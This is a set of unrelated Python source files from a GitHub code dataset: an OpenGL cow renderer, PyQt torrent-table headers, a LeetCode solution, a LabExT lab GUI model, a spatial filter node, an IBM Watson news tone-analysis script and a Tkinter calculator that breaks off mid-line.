one_ear(right, \"right\", len, weidth)\r\n\r\ndef one_ear(place, side, len, weidth):\r\n glColor3f(0, 0, 0)\r\n x, y, z = place\r\n if side == \"left\":\r\n x -= len/2\r\n else:\r\n x += len/2\r\n draw_solid_sphere(x, y, z, len, weidth, weidth)\r\n glColor3f(1, 204/255, 204/255)\r\n len /= 2\r\n z -= (5/8)*weidth\r\n weidth /= 2\r\n draw_solid_sphere(x, y, z, len, weidth, weidth)\r\n\r\ndef draw_udders(center_x, center_y, center_z, len):\r\n glColor3f(1, 204/255, 204/255)\r\n draw_solid_sphere(center_x, center_y, center_z, len, len, len)\r\n #teats\r\n teat_weidth = (1/4)*len\r\n teat_y = center_y - (1/4)*len\r\n draw_solid_sphere(center_x - len/2, teat_y, center_z - len/2, teat_weidth, len, teat_weidth)\r\n draw_solid_sphere(center_x - len/2, teat_y, center_z + len/2, teat_weidth, len, teat_weidth)\r\n draw_solid_sphere(center_x + len/2, teat_y, center_z - len/2, teat_weidth, len, teat_weidth)\r\n draw_solid_sphere(center_x + len/2, teat_y, center_z + len/2, teat_weidth, len, teat_weidth)\r\n\r\ndef draw_tail(x, y, z, len, tail_angle_display_r, tail_angle_display_u): \r\n # (x,y,z) attachment point to the body \r\n tail_weidth = (1/4)*len\r\n\r\n vertices = [(x + (1/2)*tail_weidth, y, z), #0\r\n (x - (1/2)*tail_weidth, y, z), #1\r\n (x + (1/2)*tail_weidth, y, z + tail_weidth), #2\r\n (x - (1/2)*tail_weidth, y, z + tail_weidth), #3\r\n (x + (1/2)*tail_weidth, y - len, z), #4\r\n (x - (1/2)*tail_weidth, y - len, z), #5\r\n (x + (1/2)*tail_weidth, y - len, z + tail_weidth), #6\r\n (x - (1/2)*tail_weidth, y - len, z + tail_weidth)] #7\r\n indices = [((0, 1, 3, 2), 0),\r\n ((4, 5, 7, 6), 0),\r\n ((0, 1, 5, 4), 0),\r\n ((0, 2, 6, 4), 0),\r\n ((2, 3, 7, 6), 0),\r\n ((3, 1, 5, 7), 0)]\r\n \r\n glPushMatrix()\r\n glTranslate(x,y,z)\r\n glRotatef(tail_angle_display_r, 0, 0, 1)\r\n glRotatef(tail_angle_display_u, 1, 0, 0)\r\n glTranslate(-x,-y,-z)\r\n draw_item(vertices, indices, [(0,0,0)])\r\n glColor3f(1, 1, 1)\r\n draw_solid_sphere(x, y - len - (1/2)*tail_weidth, z + (1/2)*tail_weidth, (2/3)*tail_weidth, \r\n (3/2)*tail_weidth, (2/3)*tail_weidth)\r\n glPopMatrix()\r\n\r\n","repo_name":"yuvalg4/cow-project","sub_path":"cow.py","file_name":"cow.py","file_ext":"py","file_size_in_byte":8972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41116331174","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\nheaders_transfers_keywords = (\"Name\", \"Category\",\"TorrentsFound\",\"Max.Age\", \"Min.Seeds\" ,\"Max.Size\",\"Status\", \"Action\",\"AddedOn\")\n\nheaders_transfers = {\"name\":0, \n \"categ\":1, \n \"max_Age\":3 ,\n \"min_Seeds\":4, \n \"max_Size\":5,\n \"status\":6, \n \"action\":7,\n \"added_On\":8,\n \"torrents_Found\":2\n }\n\n\nheaders_torrents = {\"name\":0,\"age\":1,\"date\":2,\"size\":3,\"size_Mb\":4,\"seeds\":5,\"peers\":6,\"categ\":7,\"hash\":8, \"fid\":9}\n\nheaders_torrents_keywords = (\"Name\",\"Age\",\"Date\",\"Size\",\"SizeMB\",\"Seeders\",\"Peers\",\"Category\",\"Hash\", \"FilterId\")","repo_name":"thegreyd/znotify","sub_path":"transfers.py","file_name":"transfers.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71374621924","text":"class Solution(object):\n def luckyNumbers(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[int]\n \"\"\"\n\n min_in_rows = list()\n max_in_cols = [0] * len(matrix[0])\n lucky_numbers = list()\n\n print(max_in_cols)\n for i 
in range(len(matrix)):\n # finding minimum from row\n min_in_rows.append(min(matrix[i]))\n\n for j in range(len(matrix[i])):\n max_in_cols[j] = max(max_in_cols[j], matrix[i][j])\n\n print(min_in_rows)\n print(max_in_cols)\n\n for i in range(len(min_in_rows)):\n for j in range(len(max_in_cols)):\n if min_in_rows[i] == max_in_cols[j]:\n lucky_numbers.append(min_in_rows[i])\n\n return lucky_numbers\n\n\ns = Solution()\nprint(s.luckyNumbers([[7,8],[1,2]]))\n","repo_name":"yogesh-chaudhari-77/leetCodeChallenges","sub_path":"1380. Lucky Numbers in a Matrix.py","file_name":"1380. Lucky Numbers in a Matrix.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30810139560","text":"import logging\nfrom tkinter import BooleanVar, StringVar\n\nfrom LabExT.Model.ExperimentHandler import ExperimentHandler\nfrom LabExT.Utils import DeprecatedException\nfrom LabExT.View.Controls.ControlPanel import ControlCommand\n\n\nclass MainWindowModel:\n \"\"\"\n The model class for the Main window.\n Contains all data, and functions to manipulate said data.\n \"\"\"\n application_title = 'The Laboratory Tool'\n\n def __init__(self, controller, root, experiment_manager):\n self.root = root\n self.controller = controller\n self.view = None\n self.experiment_manager = experiment_manager\n self.chiptable_settings_path = 'experiment_chip_settings.json'\n self.savetable_settings_path = 'experiment_save_settings.json'\n self.axis_settings_path = 'mainwindow_axis_settings.json'\n self.currently_plotted_meas_name = None\n\n # do not let the user set the experiment settings manually\n self.allow_change_chip_params = BooleanVar(self.root, False)\n self.allow_change_save_params = BooleanVar(self.root, False)\n\n # from the old viewmodel file\n self.logger = logging.getLogger()\n self.logger.debug('Initialise MainWindowViewModel with tkinter: %s experiment_manager: %s',\n root,\n self.experiment_manager)\n\n self.app_width = self.root.winfo_screenwidth()\n self.app_height = self.root.winfo_screenheight()\n\n self.logger.debug('Screen size: %sx%s', self.app_width, self.app_height)\n\n # definitions for button commands\n self.commands = list()\n start_button = ControlCommand(\n self.controller.start, self.root, name='Run (F5)')\n self.commands.append(start_button)\n stop_button = ControlCommand(\n self.controller.stop, self.root, name='Abort (Escape)', can_execute=False)\n self.commands.append(stop_button)\n\n self.experiment = None\n self.chip_parameters = None\n self.save_parameters = None\n self.live_plot_data = None\n self.selec_plot_data = None\n self.last_opened_new_meas_wizard_controller = None\n\n self.load_exp_parameters()\n\n # handler to run experiments asynchronously\n self.experiment_handler = ExperimentHandler()\n self.experiment_handler.current_experiment = self.experiment\n # listen if the experiment is finished\n self.experiment_handler.experiment_finished.append(self.on_experiment_finished)\n\n # initialise execution control variables\n self.var_mm_pause = BooleanVar(self.root)\n self.var_mm_pause.trace(\"w\", self.exctrl_vars_changed)\n self.var_mm_pause_reason = StringVar(self.root)\n self.var_auto_move = BooleanVar(self.root)\n self.var_auto_move.trace(\"w\", self.exctrl_vars_changed)\n self.var_auto_move_reason = StringVar(self.root)\n self.var_sfp_ena = BooleanVar(self.root)\n self.var_sfp_ena.trace(\"w\", self.exctrl_vars_changed)\n self.var_sfp_ena_reason = StringVar(self.root)\n 
self.var_imeas_wait_time_str = StringVar(self.root, \"0.0\")\n self.var_imeas_wait_time_str.trace(\"w\", self.exctrl_vars_changed)\n\n # status of various sub-modules\n self.status_mover_connected_stages = BooleanVar(self.root)\n self.status_mover_connected_stages.trace(\"w\", self.submodule_status_updated)\n self.status_mover_can_move_to_device = BooleanVar(self.root)\n self.status_mover_can_move_to_device.trace(\"w\", self.submodule_status_updated)\n self.status_sfp_initialized = BooleanVar(self.root)\n self.status_sfp_initialized.trace(\"w\", self.submodule_status_updated)\n\n # for testing across threads\n self.allow_GUI_changes = True # set to False to not invoke TK callbacks\n\n def load_exp_parameters(self):\n \"\"\"\n Loads all experiment parameters and saves them within the model.\n \"\"\"\n if self.experiment_manager.exp:\n self.experiment = self.experiment_manager.exp\n self.chip_parameters = self.experiment_manager.exp.chip_parameters\n self.save_parameters = self.experiment_manager.exp.save_parameters\n self.live_plot_data = self.experiment.live_plot_collection\n self.selec_plot_data = self.experiment.selec_plot_collection\n\n def experiment_changed(self, ex):\n raise DeprecatedException(\"Experiment object must not be recreated!\")\n\n def settings(self):\n raise DeprecationWarning(\"Open Settings window is deprecated. Do not use!\")\n\n def on_experiment_start(self):\n \"\"\"\n Upon start of the experiment alters which buttons are pressable.\n \"\"\"\n if not self.allow_GUI_changes:\n return\n\n # change control button states\n self.commands[0].can_execute = False # disable the start button\n self.commands[1].can_execute = True # enable the stop button\n # disable change in experiment parameters\n self.allow_change_chip_params.set(False)\n self.allow_change_save_params.set(False)\n\n def on_experiment_finished(self):\n \"\"\"Called when an experiment is finished. 
Resets control\n buttons.\n \"\"\"\n if not self.allow_GUI_changes:\n return\n\n self.logger.debug('Experiment finished, resetting controls...')\n self.commands[0].can_execute = True # enable the start button\n self.commands[1].can_execute = False # disable the stop button\n # enable change in save file parameters\n self.allow_change_save_params.set(True)\n\n def exctrl_vars_changed(self, *args):\n \"\"\"\n Called by Tkinter once any execution control variables changed.\n\n Parameters\n ----------\n *args\n Tkinter arguments, not needed.\n \"\"\"\n if not self.allow_GUI_changes:\n return\n\n # save updates of control variables to log\n self.logger.debug('State of manual mode is: %s', self.var_mm_pause.get())\n self.logger.debug('State of auto move is: %s', self.var_auto_move.get())\n self.logger.debug('State of SFP enable is: %s', self.var_sfp_ena.get())\n self.logger.debug('Inter-measurement wait time is: %s', self.var_imeas_wait_time_str.get())\n\n # propagate change to experiment\n self.experiment_manager.exp.exctrl_pause_after_device = self.var_mm_pause.get()\n self.experiment_manager.exp.exctrl_auto_move_stages = self.var_auto_move.get()\n self.experiment_manager.exp.exctrl_enable_sfp = self.var_sfp_ena.get()\n\n # allow wait time changes only if manual mode is not activated\n if self.var_mm_pause.get():\n self.view.frame.control_panel.exctrl_wait_time.config(state='disabled')\n self.view.frame.control_panel.wait_time_lbl.config(state='disabled')\n else:\n self.view.frame.control_panel.exctrl_wait_time.config(state='normal')\n self.view.frame.control_panel.wait_time_lbl.config(state='normal')\n\n # convert wait time to float and check for positive-ness\n try:\n imeas_wait_time = float(self.var_imeas_wait_time_str.get())\n except ValueError:\n # text does not convert to float, so we skip updating the variable\n return\n\n if imeas_wait_time < 0.0:\n self.logger.info('Inter-measurement wait time cannot be negative. 
Setting to 0.0')\n imeas_wait_time = 0.0\n self.var_imeas_wait_time_str.set(\"0.0\")\n\n self.experiment_manager.exp.exctrl_inter_measurement_wait_time = imeas_wait_time\n\n def submodule_status_updated(self, *args):\n \"\"\"\n Callback on any status change of the submodules\n \"\"\"\n\n if not self.allow_GUI_changes:\n return\n\n # this variable should track Mover.mover_enabled\n has_connected_stages = bool(self.status_mover_connected_stages.get())\n # this variable should track Mover.trafo_enabled\n can_move_to_device = bool(self.status_mover_can_move_to_device.get())\n # this variable should track PeakSearcher.initialized\n sfp_init = bool(self.status_sfp_initialized.get())\n\n if not has_connected_stages:\n reason = \"No connected stages\"\n self.var_mm_pause.set(True)\n self.var_mm_pause_reason.set(reason)\n # self._main_window.exctrl_mm_pause.config(state='disabled')\n self.var_auto_move.set(False)\n self.var_auto_move_reason.set(reason)\n self.view.frame.control_panel.exctrl_auto_move.config(state='disabled')\n self.var_sfp_ena.set(False)\n self.var_sfp_ena_reason.set(reason)\n self.view.frame.control_panel.exctrl_sfp_ena.config(state='disabled')\n else:\n if not can_move_to_device:\n self.var_mm_pause.set(True)\n self.var_mm_pause_reason.set(\"Mover is not fully calibrated\")\n # self._main_window.exctrl_mm_pause.config(state='disabled')\n self.var_auto_move.set(False)\n self.var_auto_move_reason.set(\"Mover is not fully calibrated\")\n self.view.frame.control_panel.exctrl_auto_move.config(state='disabled')\n else:\n # self.var_mm_pause.set(X) # no change\n self.var_mm_pause_reason.set(\"\")\n # self._main_window.exctrl_mm_pause.config(state='normal')\n # self.var_auto_move.set(X) # no change\n self.var_auto_move_reason.set(\"\")\n self.view.frame.control_panel.exctrl_auto_move.config(state='normal')\n if not sfp_init:\n self.var_sfp_ena.set(False)\n self.var_sfp_ena_reason.set(\"Search-for-peak not initialized\")\n self.view.frame.control_panel.exctrl_sfp_ena.config(state='disabled')\n else:\n # self.var_sfp_ena.set(X) # no change\n self.var_sfp_ena_reason.set(\"\")\n self.view.frame.control_panel.exctrl_sfp_ena.config(state='normal')\n","repo_name":"LabExT/LabExT","sub_path":"LabExT/View/MainWindow/MainWindowModel.py","file_name":"MainWindowModel.py","file_ext":"py","file_size_in_byte":10075,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"3709656546","text":"import multiprocessing as mp\nimport numpy as np\nimport fsgui.process\nimport fsgui.node\nimport json\nimport shapely\n\nclass AxisAlignedRectangleFilterType(fsgui.node.NodeTypeObject):\n def __init__(self, type_id):\n super().__init__(\n type_id=type_id,\n node_class='filter',\n name='Axis-aligned rectangle filter',\n datatype='bool',\n default= {\n 'type_id': type_id,\n 'instance_id': '',\n 'nickname': 'Axis-aligned rectangle filter',\n 'source_id': None,\n 'lowerLeftX': 0,\n 'lowerLeftY': 0,\n 'upperRightX': 0,\n 'upperRightY': 0,\n }\n )\n\n def write_template(self, config = None):\n if config is None:\n config = self.default()\n return [\n {\n 'name': 'type_id',\n 'type': 'hidden',\n 'default': config['type_id'],\n },\n {\n 'name': 'instance_id',\n 'type': 'hidden',\n 'default': config['instance_id'],\n },\n {\n 'label': 'Nickname',\n 'name': 'nickname',\n 'type': 'string',\n 'default': config['nickname'],\n 'tooltip': 'This is the name the source is displayed as in menus.',\n },\n {\n 'label': 'Source',\n 'name': 'source_id',\n 'type': 'node:point2d',\n 
'default': config['source_id'],\n 'tooltip': 'Source to receive spatial data from',\n },\n {\n 'label': 'Lower Left (X)',\n 'name': 'lowerLeftX',\n 'type': 'integer',\n 'lower': 0,\n 'upper': 2000,\n 'default': config['lowerLeftX'],\n 'units': 'pixels',\n },\n {\n 'label': 'Lower Left (Y)',\n 'name': 'lowerLeftY',\n 'type': 'integer',\n 'lower': 0,\n 'upper': 2000,\n 'default': config['lowerLeftY'],\n 'units': 'pixels',\n },\n {\n 'label': 'Upper Right (X)',\n 'name': 'upperRightX',\n 'type': 'integer',\n 'lower': 0,\n 'upper': 2000,\n 'default': config['upperRightX'],\n 'units': 'pixels',\n },\n {\n 'label': 'Upper Right (Y)',\n 'name': 'upperRightY',\n 'type': 'integer',\n 'lower': 0,\n 'upper': 2000,\n 'default': config['upperRightY'],\n 'units': 'pixels',\n },\n ]\n\n def build(self, config, addr_map):\n pub_address = addr_map[config['source_id']]\n \n lower_left = config['lowerLeftX'], config['lowerLeftY']\n upper_right = config['upperRightX'], config['upperRightY']\n\n def setup(reporter, data):\n data['sub'] = fsgui.network.UnidirectionalChannelReceiver(pub_address)\n data['filter_model'] = AxisAlignedRectangleFilter(lower_left, upper_right)\n\n def workload(connection, publisher, reporter, data):\n item = data['sub'].recv(timeout=500)\n if item is not None:\n x, y = tuple(map(float, item.split(',')))\n triggered = data['filter_model'].check_bounds(x, y)\n publisher.send(f'{triggered}')\n\n return fsgui.process.build_process_object(setup, workload)\n\nclass AxisAlignedRectangleFilter:\n def __init__(self, lower_left, upper_right, inclusive=True):\n self._lower_left = lower_left\n self._upper_right = upper_right\n\n if inclusive:\n self.check_bounds = self.__check_bounds_inclusive\n else:\n self.check_bounds = self.__check_bounds_exclusive\n \n def __check_bounds_inclusive(self, x, y):\n return x >= self._lower_left[0] and x <= self._upper_right[0] and y >= self._lower_left[1] and y <= self._upper_right[1]\n\n def __check_bounds_exclusive(self, x, y):\n return x > self._lower_left[0] and x < self._upper_right[0] and y > self._lower_left[1] and y < self._upper_right[1]\n","repo_name":"LorenFrankLab/fsgui","sub_path":"fsgui/filter/spatial/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26293745227","text":"import os\nimport pickle\nfrom ibm_watson import ToneAnalyzerV3\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\n\nauthenticator = IAMAuthenticator('PRIVATE KEY')\ntone_analyzer = ToneAnalyzerV3(\n    version='2017-09-21',\n    authenticator=authenticator\n)\ntone_analyzer.set_service_url(\n    'https://api.us-south.tone-analyzer.watson.cloud.ibm.com/instances/ebd854a7-cb37-4e28-8069-95ebba735e06')\n\ncnn = dict()\nhp = dict()\nfox = dict()\nbb = dict()\n\nprint(\"Analyzing CNN...\")\nfor fname in os.listdir(r'.\\cnn'):\n    date = fname.split(\"_\")[1]\n    with open(\"cnn/\" + fname, \"r\", encoding='utf-8') as f:\n        text = f.read().replace('\\n', '')\n    ta = tone_analyzer.tone(\n        {'text': text},\n        sentences=False,\n        content_type='application/json'\n    ).get_result()\n    for tone in ta['document_tone']['tones']:\n        tDict = cnn.get(date)\n        if tDict:\n            tList = tDict.get(tone['tone_name'])\n            if tList:\n                tList.append(tone['score'])\n            else:\n                tDict[tone['tone_name']] = [tone['score']]\n        else:\n            cnn[date] = {tone['tone_name']: [tone['score']]}\n\nprint(\"Analyzing HuffPost...\")\nfor fname in os.listdir(r'.\\huffpost'):\n    date = 
fname.split(\"_\")[1]\n with open(\"huffpost/\" + fname, \"r\", encoding='utf-8') as f:\n text = f.read().replace('\\n', '')\n ta = tone_analyzer.tone(\n {'text': text},\n sentences=False,\n content_type='application/json'\n ).get_result()\n for tone in ta['document_tone']['tones']:\n tDict = hp.get(date)\n if tDict:\n tList = tDict.get(tone['tone_name'])\n if tList:\n tList.append(tone['score'])\n else:\n tDict[tone['tone_name']] = [tone['score']]\n else:\n hp[date] = {tone['tone_name']: [tone['score']]}\n\nprint(\"Analyzing Fox...\")\nfor fname in os.listdir(r'.\\fox'):\n date = fname.split(\"_\")[1]\n with open(\"fox/\" + fname, \"r\", encoding='utf-8') as f:\n text = f.read().replace('\\n', '')\n ta = tone_analyzer.tone(\n {'text': text},\n sentences=False,\n content_type='application/json'\n ).get_result()\n for tone in ta['document_tone']['tones']:\n tDict = fox.get(date)\n if tDict:\n tList = tDict.get(tone['tone_name'])\n if tList:\n tList.append(tone['score'])\n else:\n tDict[tone['tone_name']] = [tone['score']]\n else:\n fox[date] = {tone['tone_name']: [tone['score']]}\n\nprint(\"Analyzing Breitbart...\")\nfor fname in os.listdir(r'.\\breitbart'):\n date = fname.split(\"_\")[1]\n with open(\"breitbart/\" + fname, \"r\", encoding='utf-8') as f:\n text = f.read().replace('\\n', '')\n ta = tone_analyzer.tone(\n {'text': text},\n sentences=False,\n content_type='application/json'\n ).get_result()\n for tone in ta['document_tone']['tones']:\n tDict = bb.get(date)\n if tDict:\n tList = tDict.get(tone['tone_name'])\n if tList:\n tList.append(tone['score'])\n else:\n tDict[tone['tone_name']] = [tone['score']]\n else:\n bb[date] = {tone['tone_name']: [tone['score']]}\n\nfor date in cnn:\n for tone in cnn[date]:\n toneScores = cnn[date][tone]\n toneAvg = sum(toneScores) / len(toneScores)\n cnn[date][tone] = toneAvg\nfor date in hp:\n for tone in hp[date]:\n toneScores = hp[date][tone]\n toneAvg = sum(toneScores) / len(toneScores)\n hp[date][tone] = toneAvg\nfor date in fox:\n for tone in fox[date]:\n toneScores = fox[date][tone]\n toneAvg = sum(toneScores) / len(toneScores)\n fox[date][tone] = toneAvg\nfor date in bb:\n for tone in bb[date]:\n toneScores = bb[date][tone]\n toneAvg = sum(toneScores) / len(toneScores)\n bb[date][tone] = toneAvg\n\npickle.dump(cnn, open(\"cnn.p\", \"wb\"))\npickle.dump(hp, open(\"hp.p\", \"wb\"))\npickle.dump(fox, open(\"fox.p\", \"wb\"))\npickle.dump(bb, open(\"bb.p\", \"wb\"))\n","repo_name":"json1016/tonal_analysis","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5321386278","text":"from tkinter import *\r\n\r\nbase = Tk()\r\nbase.title('Calculator'); base.config(background = '#7A7A7A')\r\n\r\n#! 
CHANGE IT BEFORE POSTING IT\r\nicon_path = r'Projects\\\\calculator\\\\calculator-svg-png-icon-free-download-521113-onlinewebfontscom.png'\r\n# icon_path = input('Enter the path of the saved icon image:')\r\n\r\nbase.iconphoto(False, PhotoImage(file = icon_path))\r\n\r\ncalc = Frame(base, borderwidth = 2); calc.grid(row = 0, column = 0, padx = 5, pady = 5, columnspan = 4)\r\ntemp_calc = Frame(calc, borderwidth = 2); temp_calc.grid(row = 0, column = 0, padx = 2, pady = 2, columnspan = 4)\r\n\r\noperations_str, temp_operations_str, invalid_val, old_val, new_val, op, check_backspace, check_click = '', '', 'valid', '', '', '', 0, 0\r\n\r\ndef button_click(var):\r\n global operations_str, temp_operations_str, old_val, new_val, op, check_backspace, check_click\r\n\r\n if invalid_val == 'valid':\r\n\r\n if var == '.':\r\n temp_operations_str += '0.' if temp_operations_str == '' else '.'\r\n operations_str += '0.' if temp_operations_str == '0.' else '.'\r\n\r\n ent.delete(0, END); ent.insert(0, temp_operations_str)\r\n temp_operation = Label(calc, text = operations_str, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\n new_val = temp_operations_str\r\n\r\n elif str(var) not in '+-x%':\r\n \r\n try:\r\n operations_str += str(var); temp_operations_str += str(var)\r\n\r\n if check_backspace == 1 or check_click == 1:\r\n old_val = float(temp_operations_str)\r\n\r\n else:\r\n new_val = float(temp_operations_str)\r\n\r\n ent.delete(0, END); ent.insert(0, temp_operations_str)\r\n temp_operation = Label(calc, text = operations_str, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n \r\n except:\r\n invalid_operation()\r\n\r\n else:\r\n if not temp_operations_str:\r\n invalid_operation()\r\n\r\n else:\r\n check_backspace, check_click = 0, 0\r\n operation(op)\r\n\r\n op, temp_operations_str = str(var), ''\r\n operations_str += f'0 {op} ' if operations_str[-1] == '.' 
else f' {op} '\r\n\r\n ent.delete(0, END)\r\n temp_operation = Label(calc, text = operations_str, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\ndef operation(key):\r\n global old_val, new_val, op\r\n\r\n if not old_val:\r\n old_val, op = float(temp_operations_str), key\r\n\r\n else:\r\n new_val = float(temp_operations_str)\r\n old_val = temp_result(float(old_val), key, float(new_val))\r\n\r\n ent.delete(0, END); ent.insert(0, old_val)\r\n temp_operation = Label(calc, text = old_val, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\ndef backspace():\r\n global operations_str, temp_operations_str, check_backspace\r\n\r\n if invalid_val == 'valid':\r\n check_backspace = 1\r\n\r\n operations_str = operations_str[-2::-1][::-1] if len(operations_str) > 0 else ''\r\n temp_operations_str = temp_operations_str[-2::-1][::-1] if len(temp_operations_str) > 0 else ''\r\n\r\n ent.delete(0, END); ent.insert(0, temp_operations_str)\r\n temp_operation = Label(calc, text = operations_str, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4) \r\n\r\ndef clear():\r\n global operations_str, temp_operations_str, invalid_val, old_val, new_val, ent, check_backspace, check_click\r\n\r\n operations_str, temp_operations_str, invalid_val, old_val, new_val, check_backspace, check_click = '', '', 'valid', '', '', 0, 0\r\n\r\n ent = Entry(temp_calc, bg = '#9B9B9B', fg = 'black', width = 26, font = ('Bahnschrift Light', '10', 'bold'), borderwidth = 4, justify=RIGHT); ent.grid(row = 0,column = 0, columnspan = 2)\r\n temp_operation = Label(calc, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\ndef temp_result(temp_old_val, temp_operation_key, temp_new_val):\r\n global old_val\r\n\r\n result_var = 0\r\n\r\n if temp_new_val == 0 and temp_operation_key == '%':\r\n invalid_operation()\r\n result_var = 0\r\n \r\n elif temp_operation_key == '+':\r\n result_var = temp_old_val + temp_new_val\r\n\r\n elif temp_operation_key == '-':\r\n result_var = temp_old_val - temp_new_val\r\n\r\n elif temp_operation_key == 'x':\r\n result_var = temp_old_val * temp_new_val\r\n\r\n elif temp_operation_key == '%':\r\n result_var = temp_old_val / temp_new_val\r\n\r\n else:\r\n result_var = temp_old_val\r\n\r\n old_val = result_var\r\n\r\n return result_var\r\n\r\ndef result():\r\n global old_val, new_val, op, operations_str, temp_operations_str, check_click\r\n\r\n if old_val == '' or new_val == '':\r\n old_val = float(temp_operations_str)\r\n result = old_val\r\n\r\n else:\r\n result = temp_result(float(old_val), op, float(new_val))\r\n old_val, op, new_val, operations_str, temp_operations_str = result, '', '', str(result), str(result)\r\n\r\n check_click = 1\r\n ent.delete(0, END); ent.insert(0, operations_str)\r\n temp_operation = Label(calc, text = temp_operations_str, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4) \r\n\r\ndef invalid_operation():\r\n global invalid_val\r\n\r\n clear()\r\n invalid_val = 
'invalid'\r\n\r\n ent = Entry(temp_calc, bg = '#9B9B9B', fg = 'black', width = 26, font = ('Bahnschrift Light', '10', 'bold'), borderwidth = 4, justify=CENTER); ent.grid(row = 0,column = 0, columnspan = 2)\r\n ent.insert(0, 'Invalid Operation !')\r\n temp_operation = Label(calc, width = 73, text = 'Invalid Operation !', font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\nent = Entry(temp_calc, bg = '#9B9B9B', fg = 'black', width = 26, font = ('Bahnschrift Light', '10', 'bold'), borderwidth = 4, justify=RIGHT); ent.grid(row = 0,column = 0, columnspan = 2)\r\n\r\nbutton_7 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '7', command = lambda: button_click('7')); button_7.grid(row = 1, column = 0)\r\nbutton_8 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '8', command = lambda: button_click('8')); button_8.grid(row = 1, column = 1)\r\nbutton_9 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '9', command = lambda: button_click('9')); button_9.grid(row = 1, column = 2)\r\n\r\nbutton_4 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '4', command = lambda: button_click('4')); button_4.grid(row = 2, column = 0)\r\nbutton_5 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '5', command = lambda: button_click('5')); button_5.grid(row = 2, column = 1)\r\nbutton_6 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '6', command = lambda: button_click('6')); button_6.grid(row = 2, column = 2)\r\n\r\nbutton_1 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '1', command = lambda: button_click('1')); button_1.grid(row = 3, column = 0)\r\nbutton_2 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '2', command = lambda: button_click('2')); button_2.grid(row = 3, column = 1)\r\nbutton_3 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '3', command = lambda: button_click('3')); button_3.grid(row = 3, column = 2)\r\n\r\nbutton_0 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '0', command = lambda: button_click('0')); button_0.grid(row = 4, column = 0)\r\n\r\nbutton_back = Button(temp_calc, width= 12, padx = 2, pady = 2, borderwidth = 3, bg = '#A1A1A1', fg = 'black', font = ('Calibri Light (Headings)', '10', 'bold'), text = '<<', command = backspace); button_back.grid(row = 0, column = 2)\r\nbutton_clr = Button(temp_calc, width= 12, padx = 2, pady = 2, borderwidth = 3, bg = '#A1A1A1', fg = 'black', font = ('Calibri Light (Headings)', '10', 'bold'), text = 'Clear', command = clear); button_clr.grid(row = 0, column = 
